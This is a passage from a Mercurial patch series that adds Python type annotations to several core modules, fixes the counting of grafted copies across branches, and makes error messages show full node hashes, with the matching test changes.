Iterable[int]) Actually passed: (self, ints: ValueError) The following methods aren't implemented on ValueError: __iter__ Differential Revision: https://phab.mercurial-scm.org/D10122 diff --git a/mercurial/shelve.py b/mercurial/shelve.py --- a/mercurial/shelve.py +++ b/mercurial/shelve.py @@ -241,7 +241,7 @@ bin(h) for h in d[b'nodestoremove'].split(b' ') ] except (ValueError, TypeError, KeyError) as err: - raise 
error.CorruptedState(pycompat.bytestr(err)) + raise error.CorruptedState(stringutil.forcebytestr(err)) @classmethod def _getversion(cls, repo): @@ -250,7 +250,7 @@ try: version = int(fp.readline().strip()) except ValueError as err: - raise error.CorruptedState(pycompat.bytestr(err)) + raise error.CorruptedState(stringutil.forcebytestr(err)) finally: fp.close() return version # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1615062406 18000 # Sat Mar 06 15:26:46 2021 -0500 # Node ID 15c2f9220ae881ca91ee8b4314965e43493b3a41 # Parent e571fec5b606667d062b7822589879a08324a1a8 typing: add type annotations to mercurial/utils/dateutil.py For now, I'm just typing around the edges to help find issues with TortoiseHg. If the custom `hgdate` type is useful elsewhere as I go, I'll move it to a file dedicated to custom types. I'm not loving the ban on camelcase type names here that test-check-code.t flagged, but I'm not sure how to disable that even if everyone agreed that it's a bad idea to go against the normal convention for types. While here, fix an issue that pytype found in `parsedate` when an invalid date tuple is passed by raising a ProgrammingError instead of crashing. (Tuple doesn't have a `strip` attribute.) 
Differential Revision: https://phab.mercurial-scm.org/D10123 diff --git a/mercurial/utils/dateutil.py b/mercurial/utils/dateutil.py --- a/mercurial/utils/dateutil.py +++ b/mercurial/utils/dateutil.py @@ -18,6 +18,18 @@ pycompat, ) +if pycompat.TYPE_CHECKING: + from typing import ( + Callable, + Dict, + Iterable, + Optional, + Tuple, + Union, + ) + + hgdate = Tuple[float, int] # (unixtime, offset) + # used by parsedate defaultdateformats = ( b'%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601 @@ -62,6 +74,7 @@ def makedate(timestamp=None): + # type: (Optional[float]) -> hgdate """Return a unix timestamp (or the current time) as a (unixtime, offset) tuple based off the local timezone.""" if timestamp is None: @@ -79,6 +92,7 @@ def datestr(date=None, format=b'%a %b %d %H:%M:%S %Y %1%2'): + # type: (Optional[hgdate], bytes) -> bytes """represent a (unixtime, offset) tuple as a localized time. unixtime is seconds since the epoch, and offset is the time zone's number of seconds away from UTC. @@ -116,11 +130,13 @@ def shortdate(date=None): + # type: (Optional[hgdate]) -> bytes """turn (timestamp, tzoff) tuple into iso 8631 date.""" return datestr(date, format=b'%Y-%m-%d') def parsetimezone(s): + # type: (bytes) -> Tuple[Optional[int], bytes] """find a trailing timezone, if any, in string, and return a (offset, remainder) pair""" s = pycompat.bytestr(s) @@ -156,6 +172,7 @@ def strdate(string, format, defaults=None): + # type: (bytes, bytes, Optional[Dict[bytes, Tuple[bytes, bytes]]]) -> hgdate """parse a localized time string and return a (unixtime, offset) tuple. if the string cannot be parsed, ValueError is raised.""" if defaults is None: @@ -198,6 +215,7 @@ def parsedate(date, formats=None, bias=None): + # type: (Union[bytes, hgdate], Optional[Iterable[bytes]], Optional[Dict[bytes, bytes]]) -> hgdate """parse a localized date/time and return a (unixtime, offset) tuple. 
The date may be a "unixtime offset" string or in one of the specified @@ -223,8 +241,11 @@ bias = {} if not date: return 0, 0 - if isinstance(date, tuple) and len(date) == 2: - return date + if isinstance(date, tuple): + if len(date) == 2: + return date + else: + raise error.ProgrammingError(b"invalid date format") if not formats: formats = defaultdateformats date = date.strip() @@ -284,6 +305,7 @@ def matchdate(date): + # type: (bytes) -> Callable[[float], bool] """Return a function that matches a given date match specifier Formats include: @@ -313,10 +335,12 @@ """ def lower(date): + # type: (bytes) -> float d = {b'mb': b"1", b'd': b"1"} return parsedate(date, extendeddateformats, d)[0] def upper(date): + # type: (bytes) -> float d = {b'mb': b"12", b'HI': b"23", b'M': b"59", b'S': b"59"} for days in (b"31", b"30", b"29"): try: # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1615064303 18000 # Sat Mar 06 15:58:23 2021 -0500 # Node ID b9f40b743627f35e85aae9fb520a02aab5afc277 # Parent 15c2f9220ae881ca91ee8b4314965e43493b3a41 typing: add type annotations to mercurial/i18n.py I'm a little unsure of this because `gettext()` clearly allows for passing unicode. But the comments seem to indicate that this is related to tests, and this was useful for catching unicode being passed to `_()` in the keyring extension. I'm also not sure why `_(None)` would make any sense, so maybe the argument shouldn't be optional? I didn't add it to the lambda in plain mode because that spilled beyond 80 characters and so black mangled it. Black and pytype disagree on where the comment to disable a check needs to go, so this has to disable and then enable the checking. 
Differential Revision: https://phab.mercurial-scm.org/D10124 diff --git a/mercurial/i18n.py b/mercurial/i18n.py --- a/mercurial/i18n.py +++ b/mercurial/i18n.py @@ -19,6 +19,14 @@ pycompat, ) +if pycompat.TYPE_CHECKING: + from typing import ( + Callable, + List, + Optional, + ) + + # modelled after templater.templatepath: if getattr(sys, 'frozen', None) is not None: module = pycompat.sysexecutable @@ -40,7 +48,10 @@ try: import ctypes + # pytype: disable=module-attr langid = ctypes.windll.kernel32.GetUserDefaultUILanguage() + # pytype: enable=module-attr + _languages = [locale.windows_locale[langid]] except (ImportError, AttributeError, KeyError): # ctypes not found or unknown langid @@ -51,7 +62,7 @@ localedir = os.path.join(datapath, 'locale') t = gettextmod.translation('hg', localedir, _languages, fallback=True) try: - _ugettext = t.ugettext + _ugettext = t.ugettext # pytype: disable=attribute-error except AttributeError: _ugettext = t.gettext @@ -60,6 +71,7 @@ def gettext(message): + # type: (Optional[bytes]) -> Optional[bytes] """Translate message. The message is looked up in the catalog to get a Unicode string, @@ -77,7 +89,7 @@ if message not in cache: if type(message) is pycompat.unicode: # goofy unicode docstrings in test - paragraphs = message.split(u'\n\n') + paragraphs = message.split(u'\n\n') # type: List[pycompat.unicode] else: # should be ascii, but we have unicode docstrings in test, which # are converted to utf-8 bytes on Python 3. 
@@ -110,6 +122,6 @@ if _plain(): - _ = lambda message: message + _ = lambda message: message # type: Callable[[bytes], bytes] else: _ = gettext # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1615071129 18000 # Sat Mar 06 17:52:09 2021 -0500 # Node ID eef13b940887a0ed0129e50f2058f1532cce4920 # Parent b9f40b743627f35e85aae9fb520a02aab5afc277 typing: add type annotations to the public methods of mercurial/subrepoutil.py Differential Revision: https://phab.mercurial-scm.org/D10125 diff --git a/mercurial/subrepoutil.py b/mercurial/subrepoutil.py --- a/mercurial/subrepoutil.py +++ b/mercurial/subrepoutil.py @@ -27,8 +27,29 @@ nullstate = (b'', b'', b'empty') +if pycompat.TYPE_CHECKING: + from typing import ( + Any, + Dict, + List, + Optional, + Set, + Tuple, + ) + from . import ( + context, + localrepo, + match as matchmod, + scmutil, + subrepo, + ui as uimod, + ) + + Substate = Dict[bytes, Tuple[bytes, bytes, bytes]] + def state(ctx, ui): + # type: (context.changectx, uimod.ui) -> Substate """return a state dict, mapping subrepo paths configured in .hgsub to tuple: (source from .hgsub, revision from .hgsubstate, kind (key in types dict)) @@ -84,6 +105,7 @@ raise def remap(src): + # type: (bytes) -> bytes for pattern, repl in p.items(b'subpaths'): # Turn r'C:\foo\bar' into r'C:\\foo\\bar' since re.sub # does a string decode. 
@@ -105,7 +127,7 @@ return src state = {} - for path, src in p.items(b''): + for path, src in p.items(b''): # type: bytes kind = b'hg' if src.startswith(b'['): if b']' not in src: @@ -136,6 +158,7 @@ def writestate(repo, state): + # type: (localrepo.localrepository, Substate) -> None """rewrite .hgsubstate in (outer) repo with these subrepo states""" lines = [ b'%s %s\n' % (state[s][1], s) @@ -146,6 +169,8 @@ def submerge(repo, wctx, mctx, actx, overwrite, labels=None): + # type: (localrepo.localrepository, context.workingctx, context.changectx, context.changectx, bool, Optional[Any]) -> Substate + # TODO: type the `labels` arg """delegated from merge.applyupdates: merging of .hgsubstate file in working context, merging context and ancestor context""" if mctx == actx: # backwards? @@ -285,6 +310,7 @@ def precommit(ui, wctx, status, match, force=False): + # type: (uimod.ui, context.workingcommitctx, scmutil.status, matchmod.basematcher, bool) -> Tuple[List[bytes], Set[bytes], Substate] """Calculate .hgsubstate changes that should be applied before committing Returns (subs, commitsubs, newstate) where @@ -355,6 +381,7 @@ def reporelpath(repo): + # type: (localrepo.localrepository) -> bytes """return path to this (sub)repo as seen from outermost repo""" parent = repo while util.safehasattr(parent, b'_subparent'): @@ -363,11 +390,13 @@ def subrelpath(sub): + # type: (subrepo.abstractsubrepo) -> bytes """return path to this subrepo as seen from outermost repo""" return sub._relpath def _abssource(repo, push=False, abort=True): + # type: (localrepo.localrepository, bool, bool) -> Optional[bytes] """return pull/push path of repo - either based on parent repo .hgsub info or on the top repo config. 
Abort or return None if no source found.""" if util.safehasattr(repo, b'_subparent'): @@ -416,6 +445,7 @@ def newcommitphase(ui, ctx): + # type: (uimod.ui, context.changectx) -> int commitphase = phases.newcommitphase(ui) substate = getattr(ctx, "substate", None) if not substate: # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1615074693 18000 # Sat Mar 06 18:51:33 2021 -0500 # Node ID 77e129be10de427144d7cd7c1b3575e5240390c6 # Parent eef13b940887a0ed0129e50f2058f1532cce4920 typing: add some type annotations to mercurial/phases.py Some of these were helpful in typing other modules, and then I typed the easy-ish ones. Black forces the long `Phasedefaults` definition to be wrapped, which pytype seems OK with (as shown with `reveal_type()`), but it does seem to confuse PyCharm a bit. Differential Revision: https://phab.mercurial-scm.org/D10126 diff --git a/mercurial/phases.py b/mercurial/phases.py --- a/mercurial/phases.py +++ b/mercurial/phases.py @@ -127,10 +127,32 @@ util, ) +if pycompat.TYPE_CHECKING: + from typing import ( + Any, + Callable, + Dict, + Iterable, + List, + Optional, + Set, + Tuple, + ) + from . 
import ( + localrepo, + ui as uimod, + ) + + Phaseroots = Dict[int, Set[bytes]] + Phasedefaults = List[ + Callable[[localrepo.localrepository, Phaseroots], Phaseroots] + ] + + _fphasesentry = struct.Struct(b'>i20s') # record phase index -public, draft, secret = range(3) +public, draft, secret = range(3) # type: int archived = 32 # non-continuous for compatibility internal = 96 # non-continuous for compatibility allphases = (public, draft, secret, archived, internal) @@ -154,11 +176,13 @@ def supportinternal(repo): + # type: (localrepo.localrepository) -> bool """True if the internal phase can be used on a repository""" return requirements.INTERNAL_PHASE_REQUIREMENT in repo.requirements def _readroots(repo, phasedefaults=None): + # type: (localrepo.localrepository, Optional[Phasedefaults]) -> Tuple[Phaseroots, bool] """Read phase roots from disk phasedefaults is a list of fn(repo, roots) callable, which are @@ -191,6 +215,7 @@ def binaryencode(phasemapping): + # type: (Dict[int, List[bytes]]) -> bytes """encode a 'phase -> nodes' mapping into a binary stream The revision lists are encoded as (phase, root) pairs. @@ -203,6 +228,7 @@ def binarydecode(stream): + # type: (...) 
-> Dict[int, List[bytes]] """decode a binary stream into a 'phase -> nodes' mapping The (phase, root) pairs are turned back into a dictionary with @@ -321,6 +347,7 @@ class phasecache(object): def __init__(self, repo, phasedefaults, _load=True): + # type: (localrepo.localrepository, Optional[Phasedefaults], bool) -> None if _load: # Cheap trick to allow shallow-copy without copy module self.phaseroots, self.dirty = _readroots(repo, phasedefaults) @@ -330,6 +357,7 @@ self.opener = repo.svfs def hasnonpublicphases(self, repo): + # type: (localrepo.localrepository) -> bool """detect if there are revisions with non-public phase""" repo = repo.unfiltered() cl = repo.changelog @@ -343,6 +371,7 @@ ) def nonpublicphaseroots(self, repo): + # type: (localrepo.localrepository) -> Set[bytes] """returns the roots of all non-public phases The roots are not minimized, so if the secret revisions are @@ -362,6 +391,8 @@ ) def getrevset(self, repo, phases, subset=None): + # type: (localrepo.localrepository, Iterable[int], Optional[Any]) -> Any + # TODO: finish typing this """return a smartset for the given phases""" self.loadphaserevs(repo) # ensure phase's sets are loaded phases = set(phases) @@ -457,6 +488,7 @@ self._loadedrevslen = len(cl) def loadphaserevs(self, repo): + # type: (localrepo.localrepository) -> None """ensure phase information is loaded in the object""" if self._phasesets is None: try: @@ -470,6 +502,7 @@ self._phasesets = None def phase(self, repo, rev): + # type: (localrepo.localrepository, int) -> int # We need a repo argument here to be able to build _phasesets # if necessary. The repository instance is not stored in # phasecache to avoid reference cycles. The changelog instance @@ -652,6 +685,7 @@ return False def filterunknown(self, repo): + # type: (localrepo.localrepository) -> None """remove unknown nodes from the phase boundary Nothing is lost as unknown nodes only hold data for their descendants. 
@@ -729,6 +763,7 @@ def listphases(repo): + # type: (localrepo.localrepository) -> Dict[bytes, bytes] """List phases root for serialization over pushkey""" # Use ordered dictionary so behavior is deterministic. keys = util.sortdict() @@ -760,6 +795,7 @@ def pushphase(repo, nhex, oldphasestr, newphasestr): + # type: (localrepo.localrepository, bytes, bytes, bytes) -> bool """List phases root for serialization over pushkey""" repo = repo.unfiltered() with repo.lock(): @@ -909,6 +945,7 @@ def newcommitphase(ui): + # type: (uimod.ui) -> int """helper to get the target phase of new commit Handle all possible values for the phases.new-commit options. @@ -924,11 +961,13 @@ def hassecret(repo): + # type: (localrepo.localrepository) -> bool """utility function that check if a repo have any secret changeset.""" return bool(repo._phasecache.phaseroots[secret]) def preparehookargs(node, old, new): + # type: (bytes, Optional[int], Optional[int]) -> Dict[bytes, bytes] if old is None: old = b'' else: # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1615092092 18000 # Sat Mar 06 23:41:32 2021 -0500 # Node ID 7711853110b9be20bdb68a2f0f90d3a527ac29ff # Parent 77e129be10de427144d7cd7c1b3575e5240390c6 typing: add some type annotations to mercurial/util.py Differential Revision: https://phab.mercurial-scm.org/D10127 diff --git a/mercurial/util.py b/mercurial/util.py --- a/mercurial/util.py +++ b/mercurial/util.py @@ -59,6 +59,16 @@ stringutil, ) +if pycompat.TYPE_CHECKING: + from typing import ( + Iterator, + List, + Optional, + Tuple, + Union, + ) + + base85 = policy.importmod('base85') osutil = policy.importmod('osutil') @@ -133,6 +143,7 @@ def setumask(val): + # type: (int) -> None ''' updates the umask. 
used by chg server ''' if pycompat.iswindows: return @@ -307,7 +318,7 @@ try: - buffer = buffer + buffer = buffer # pytype: disable=name-error except NameError: def buffer(sliceable, offset=0, length=None): @@ -1833,6 +1844,7 @@ def pathto(root, n1, n2): + # type: (bytes, bytes, bytes) -> bytes """return the relative path from one place to another. root should use os.sep to separate directories n1 should use os.sep to separate directories @@ -2017,6 +2029,7 @@ def checkwinfilename(path): + # type: (bytes) -> Optional[bytes] r"""Check that the base-relative path is a valid filename on Windows. Returns None if the path is ok, or a UI string describing the problem. @@ -2111,6 +2124,7 @@ def readlock(pathname): + # type: (bytes) -> bytes try: return readlink(pathname) except OSError as why: @@ -2134,6 +2148,7 @@ def fscasesensitive(path): + # type: (bytes) -> bool """ Return true if the given path is on a case-sensitive filesystem @@ -2215,6 +2230,7 @@ def fspath(name, root): + # type: (bytes, bytes) -> bytes """Get name in the case stored in the filesystem The name should be relative to root, and be normcase-ed for efficiency. @@ -2259,6 +2275,7 @@ def checknlink(testfile): + # type: (bytes) -> bool '''check whether hardlink count reporting works properly''' # testfile may be open, so we need a separate file for checking to @@ -2292,8 +2309,9 @@ def endswithsep(path): + # type: (bytes) -> bool '''Check path ends with os.sep or os.altsep.''' - return ( + return bool( # help pytype path.endswith(pycompat.ossep) or pycompat.osaltsep and path.endswith(pycompat.osaltsep) @@ -2301,6 +2319,7 @@ def splitpath(path): + # type: (bytes) -> List[bytes] """Split path by os.sep. Note that this function does not use os.altsep because this is an alternative of simple "xxx.split(os.sep)". 
@@ -2529,6 +2548,7 @@ def unlinkpath(f, ignoremissing=False, rmdir=True): + # type: (bytes, bool, bool) -> None """unlink and remove the directory if it is empty""" if ignoremissing: tryunlink(f) @@ -2543,6 +2563,7 @@ def tryunlink(f): + # type: (bytes) -> None """Attempt to remove a file, ignoring ENOENT errors.""" try: unlink(f) @@ -2552,6 +2573,7 @@ def makedirs(name, mode=None, notindexed=False): + # type: (bytes, Optional[int], bool) -> None """recursive directory creation with parent mode inheritance Newly created directories are marked as "not to be indexed by @@ -2581,16 +2603,19 @@ def readfile(path): + # type: (bytes) -> bytes with open(path, b'rb') as fp: return fp.read() def writefile(path, text): + # type: (bytes, bytes) -> None with open(path, b'wb') as fp: fp.write(text) def appendfile(path, text): + # type: (bytes, bytes) -> None with open(path, b'ab') as fp: fp.write(text) @@ -2752,6 +2777,7 @@ def processlinerange(fromline, toline): + # type: (int, int) -> Tuple[int, int] """Check that linerange <fromline>:<toline> makes sense and return a 0-based range. @@ -2811,10 +2837,12 @@ def tolf(s): + # type: (bytes) -> bytes return _eolre.sub(b'\n', s) def tocrlf(s): + # type: (bytes) -> bytes return _eolre.sub(b'\r\n', s) @@ -2878,12 +2906,14 @@ def iterlines(iterator): + # type: (Iterator[bytes]) -> Iterator[bytes] for chunk in iterator: for line in chunk.splitlines(): yield line def expandpath(path): + # type: (bytes) -> bytes return os.path.expanduser(os.path.expandvars(path)) @@ -2914,6 +2944,7 @@ def getport(port): + # type: (Union[bytes, int]) -> int """Return the port for a given network service. If port is an integer, it's returned as is. 
If it's a string, it's @@ -3012,6 +3043,7 @@ _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match def __init__(self, path, parsequery=True, parsefragment=True): + # type: (bytes, bool, bool) -> None # We slowly chomp away at path until we have only the path left self.scheme = self.user = self.passwd = self.host = None self.port = self.path = self.query = self.fragment = None @@ -3239,6 +3271,7 @@ return False def localpath(self): + # type: () -> bytes if self.scheme == b'file' or self.scheme == b'bundle': path = self.path or b'/' # For Windows, we need to promote hosts containing drive @@ -3262,18 +3295,22 @@ def hasscheme(path): - return bool(url(path).scheme) + # type: (bytes) -> bool + return bool(url(path).scheme) # cast to help pytype def hasdriveletter(path): - return path and path[1:2] == b':' and path[0:1].isalpha() + # type: (bytes) -> bool + return bool(path) and path[1:2] == b':' and path[0:1].isalpha() def urllocalpath(path): + # type: (bytes) -> bytes return url(path, parsequery=False, parsefragment=False).localpath() def checksafessh(path): + # type: (bytes) -> None """check if a path / url is a potentially unsafe ssh exploit (SEC) This is a sanity check for ssh urls. ssh will parse the first item as @@ -3291,6 +3328,7 @@ def hidepassword(u): + # type: (bytes) -> bytes '''hide user credential in a url string''' u = url(u) if u.passwd: @@ -3299,6 +3337,7 @@ def removeauth(u): + # type: (bytes) -> bytes '''remove all authentication information from a url string''' u = url(u) u.user = u.passwd = None @@ -3404,6 +3443,7 @@ def sizetoint(s): + # type: (bytes) -> int """Convert a space specifier to a byte count. >>> sizetoint(b'30') @@ -3629,6 +3669,7 @@ def _estimatememory(): + # type: () -> Optional[int] """Provide an estimate for the available system memory in Bytes. If no estimate can be provided on the platform, returns None. 
@@ -3636,7 +3677,12 @@ if pycompat.sysplatform.startswith(b'win'): # On Windows, use the GlobalMemoryStatusEx kernel function directly. from ctypes import c_long as DWORD, c_ulonglong as DWORDLONG - from ctypes.wintypes import Structure, byref, sizeof, windll + from ctypes.wintypes import ( # pytype: disable=import-error + Structure, + byref, + sizeof, + windll, + ) class MEMORYSTATUSEX(Structure): _fields_ = [ # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1615092224 18000 # Sat Mar 06 23:43:44 2021 -0500 # Node ID 5d483e3bb60ef6afb0cb9e0c0dcf8cdb436f35d2 # Parent 7711853110b9be20bdb68a2f0f90d3a527ac29ff typing: add some type annotations to mercurial/pathutil.py Differential Revision: https://phab.mercurial-scm.org/D10128 diff --git a/mercurial/pathutil.py b/mercurial/pathutil.py --- a/mercurial/pathutil.py +++ b/mercurial/pathutil.py @@ -15,11 +15,21 @@ util, ) +if pycompat.TYPE_CHECKING: + from typing import ( + Any, + Callable, + Iterator, + Optional, + ) + + rustdirs = policy.importrust('dirstate', 'Dirs') parsers = policy.importmod('parsers') def _lowerclean(s): + # type: (bytes) -> bytes return encoding.hfsignoreclean(s.lower()) @@ -59,6 +69,7 @@ self.normcase = lambda x: x def __call__(self, path, mode=None): + # type: (bytes, Optional[Any]) -> None """Check the relative path. path may contain a pattern (e.g. 
foodir/**.txt)""" @@ -119,6 +130,7 @@ self.audited.add(normpath) def _checkfs(self, prefix, path): + # type: (bytes, bytes) -> None """raise exception if a file system backed check fails""" curpath = os.path.join(self.root, prefix) try: @@ -143,6 +155,7 @@ raise error.Abort(msg % (path, pycompat.bytestr(prefix))) def check(self, path): + # type: (bytes) -> bool try: self(path) return True @@ -164,6 +177,7 @@ def canonpath(root, cwd, myname, auditor=None): + # type: (bytes, bytes, bytes, Optional[pathauditor]) -> bytes """return the canonical path of myname, given cwd and root >>> def check(root, cwd, myname): @@ -266,6 +280,7 @@ def normasprefix(path): + # type: (bytes) -> bytes """normalize the specified path as path prefix Returned value can be used safely for "p.startswith(prefix)", @@ -289,6 +304,7 @@ def finddirs(path): + # type: (bytes) -> Iterator[bytes] pos = path.rfind(b'/') while pos != -1: yield path[:pos] @@ -318,6 +334,7 @@ addpath(f) def addpath(self, path): + # type: (bytes) -> None dirs = self._dirs for base in finddirs(path): if base.endswith(b'/'): @@ -330,6 +347,7 @@ dirs[base] = 1 def delpath(self, path): + # type: (bytes) -> None dirs = self._dirs for base in finddirs(path): if dirs[base] > 1: @@ -341,6 +359,7 @@ return iter(self._dirs) def __contains__(self, d): + # type: (bytes) -> bool return d in self._dirs @@ -355,4 +374,4 @@ # rather not let our internals know that we're thinking in posix terms # - instead we'll let them be oblivious. join = posixpath.join -dirname = posixpath.dirname +dirname = posixpath.dirname # type: Callable[[bytes], bytes] # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1614968204 28800 # Fri Mar 05 10:16:44 2021 -0800 # Node ID 86ee73018e62f13f4141aa69776710e15fef6a8c # Parent 5d483e3bb60ef6afb0cb9e0c0dcf8cdb436f35d2 tests: demonstrate how grafted copies are counted when tracing across branches This test demonstrates a regression from 1d6d1a15. 
Differential Revision: https://phab.mercurial-scm.org/D10117 diff --git a/tests/test-copies.t b/tests/test-copies.t --- a/tests/test-copies.t +++ b/tests/test-copies.t @@ -378,6 +378,32 @@ $ hg debugpathcopies 1 3 x -> z +Copy x->y on two separate branches. Pathcopies from one branch to the other +should not report the copy. + $ newrepo + $ echo x > x + $ hg ci -Aqm 'add x' + $ hg cp x y + $ hg ci -qm 'copy x to y' + $ hg co -q 0 + $ hg graft 1 -q + $ hg l + @ 2 copy x to y + | y + | o 1 copy x to y + |/ y + o 0 add x + x + $ hg debugp1copies -r 1 + x -> y + $ hg debugp1copies -r 2 + x -> y +BROKEN: These two should not report any copies + $ hg debugpathcopies 1 2 + x -> y + $ hg debugpathcopies 2 1 + x -> y + Copy x to y on one side of merge, create y and rename to z on the other side. $ newrepo $ echo x > x # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1614983212 28800 # Fri Mar 05 14:26:52 2021 -0800 # Node ID eca88f5fbcb26488397c2df60f173c6d624d6394 # Parent 86ee73018e62f13f4141aa69776710e15fef6a8c copies: extract function _reverse_renames() for reversing renames I'll add another caller in the next patch. Differential Revision: https://phab.mercurial-scm.org/D10118 diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -704,22 +704,28 @@ def _backwardrenames(a, b, match): + """find renames from a to b""" if a._repo.ui.config(b'experimental', b'copytrace') == b'off': return {} + # We don't want to pass in "match" here, since that would filter + # the destination by it. Since we're reversing the copies, we want + # to filter the source instead. + copies = _forwardcopies(b, a) + return _reverse_renames(copies, a, match) + + +def _reverse_renames(copies, dst, match): + """given copies to context 'dst', finds renames from that context""" # Even though we're not taking copies into account, 1:n rename situations # can still exist (e.g. hg cp a b; hg mv a c).
In those cases we # arbitrarily pick one of the renames. - We don't want to pass in "match" here, since that would filter - the destination by it. Since we're reversing the copies, we want - to filter the source instead. - f = _forwardcopies(b, a) r = {} - for k, v in sorted(pycompat.iteritems(f)): + for k, v in sorted(pycompat.iteritems(copies)): if match and not match(v): continue # remove copies - if v in a: + if v in dst: continue r[v] = k return r # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1614983216 28800 # Fri Mar 05 14:26:56 2021 -0800 # Node ID 324ded1aa2ab683cfe794419b6f5d64b67443b03 # Parent eca88f5fbcb26488397c2df60f173c6d624d6394 copies: inline _backwardrenames() in pathcopies() I'll add another filtering step in `pathcopies()` next. I need access to the forward copies for that. Differential Revision: https://phab.mercurial-scm.org/D10119 diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -761,9 +761,12 @@ base = None if a.rev() != nullrev: base = x + x_copies = _forwardcopies(a, x) + y_copies = _forwardcopies(a, y, base, match=match) + x_backward_renames = _reverse_renames(x_copies, x, match) copies = _chain( - _backwardrenames(x, a, match=match), - _forwardcopies(a, y, base, match=match), + x_backward_renames, + y_copies, ) _filter(x, y, copies) return copies # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1614874819 28800 # Thu Mar 04 08:20:19 2021 -0800 # Node ID 2803f94b74314f6c72edfe70868da745651477b8 # Parent 324ded1aa2ab683cfe794419b6f5d64b67443b03 copies: filter out copies grafted from another branch Consider this simple history: ``` @ 3 modify y | o 2 copy x to y, modify x | | o 1 copy x to y, modify x |/ o 0 add x ``` If we now rebase commit 3 onto 1, Mercurial will look for copies between commit 2 and commit 1. It does that by going backwards from 2 to 0 and then forwards from 0 to 1.
It will find that x was copied to y, since that was what happened on the path between them (namely in commit 1). That leads Mercurial to do a 3-way merge between y@3 and y@1 with x@2 as base. We want to use y@2 as base instead. That's also what happened until commit 1d6d1a15. This patch fixes the regression by adding another filtering step when chaining copies via a diffbase. The new filtering step removes copies that were the same between the two branches (same source and destination, but not necessarily the same contents). Differential Revision: https://phab.mercurial-scm.org/D10120 diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -763,6 +763,11 @@ base = x x_copies = _forwardcopies(a, x) y_copies = _forwardcopies(a, y, base, match=match) + same_keys = set(x_copies) & set(y_copies) + for k in same_keys: + if x_copies.get(k) == y_copies.get(k): + del x_copies[k] + del y_copies[k] x_backward_renames = _reverse_renames(x_copies, x, match) copies = _chain( x_backward_renames, diff --git a/tests/test-copies.t b/tests/test-copies.t --- a/tests/test-copies.t +++ b/tests/test-copies.t @@ -398,11 +398,8 @@ x -> y $ hg debugp1copies -r 2 x -> y -BROKEN: These two should not report any copies $ hg debugpathcopies 1 2 - x -> y $ hg debugpathcopies 2 1 - x -> y Copy x to y on one side of merge, create y and rename to z on the other side. $ newrepo diff --git a/tests/test-graft.t b/tests/test-graft.t --- a/tests/test-graft.t +++ b/tests/test-graft.t @@ -223,10 +223,6 @@ committing changelog updating the branch cache grafting 5:97f8bfe72746 "5" - all copies found (* = to merge, ! 
= divergent, % = renamed and deleted): - on local side: - src: 'c' -> dst: 'b' - checking for directory renames resolving manifests branchmerge: True, force: True, partial: False ancestor: 4c60f11aa304, local: 6b9e5368ca4e+, remote: 97f8bfe72746 @@ -240,10 +236,6 @@ $ HGEDITOR=cat hg graft 4 3 --log --debug scanning for duplicate grafts grafting 4:9c233e8e184d "4" - all copies found (* = to merge, ! = divergent, % = renamed and deleted): - on local side: - src: 'c' -> dst: 'b' - checking for directory renames resolving manifests branchmerge: True, force: True, partial: False ancestor: 4c60f11aa304, local: 1905859650ec+, remote: 9c233e8e184d # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1612958094 -19800 # Wed Feb 10 17:24:54 2021 +0530 # Node ID 6fc57680cfd64aa4f1843b44402c6661aed7cb9d # Parent 2803f94b74314f6c72edfe70868da745651477b8 error: remove shortening of node in error message This strips the complete 20-byte node which was not found. Having the full node in the error message is important as it makes debugging easier. If a short node is to be displayed, that should be done by callers. Differential Revision: https://phab.mercurial-scm.org/D9994 diff --git a/mercurial/error.py b/mercurial/error.py --- a/mercurial/error.py +++ b/mercurial/error.py @@ -73,9 +73,9 @@ # Python 2.6+ complain about the 'message' property being deprecated self.lookupmessage = message if isinstance(name, bytes) and len(name) == 20: - from .node import short + from .node import hex - name = short(name) + name = hex(name) # if name is a binary node, it can be None RevlogError.__init__( self, b'%s@%s: %s' % (index, pycompat.bytestr(name), message) diff --git a/tests/test-bundle-r.t b/tests/test-bundle-r.t --- a/tests/test-bundle-r.t +++ b/tests/test-bundle-r.t @@ -223,7 +223,7 @@ adding changesets transaction abort!
rollback completed - abort: 00changelog.i@93ee6ab32777: unknown parent + abort: 00changelog.i@93ee6ab32777cd430e07da694794fb6a4f917712: unknown parent [50] revision 2 diff --git a/tests/test-bundle.t b/tests/test-bundle.t --- a/tests/test-bundle.t +++ b/tests/test-bundle.t @@ -733,7 +733,7 @@ partial history bundle, fails w/ unknown parent $ hg -R bundle.hg verify - abort: 00changelog.i@bbd179dfa0a7: unknown parent + abort: 00changelog.i@bbd179dfa0a71671c253b3ae0aa1513b60d199fa: unknown parent [50] full history bundle, refuses to verify non-local repo diff --git a/tests/test-convert-filemap.t b/tests/test-convert-filemap.t --- a/tests/test-convert-filemap.t +++ b/tests/test-convert-filemap.t @@ -292,12 +292,12 @@ $ rm -rf source/.hg/store/data/dir/file4 #endif $ hg -q convert --filemap renames.fmap --datesort source dummydest - abort: data/dir/file3.i@e96dce0bc6a2: no match found (reporevlogstore !) + abort: data/dir/file3.i@e96dce0bc6a217656a3a410e5e6bec2c4f42bf7c: no match found (reporevlogstore !) abort: data/dir/file3/index@e96dce0bc6a2: no node (reposimplestore !) [50] $ hg -q convert --filemap renames.fmap --datesort --config convert.hg.ignoreerrors=1 source renames.repo - ignoring: data/dir/file3.i@e96dce0bc6a2: no match found (reporevlogstore !) - ignoring: 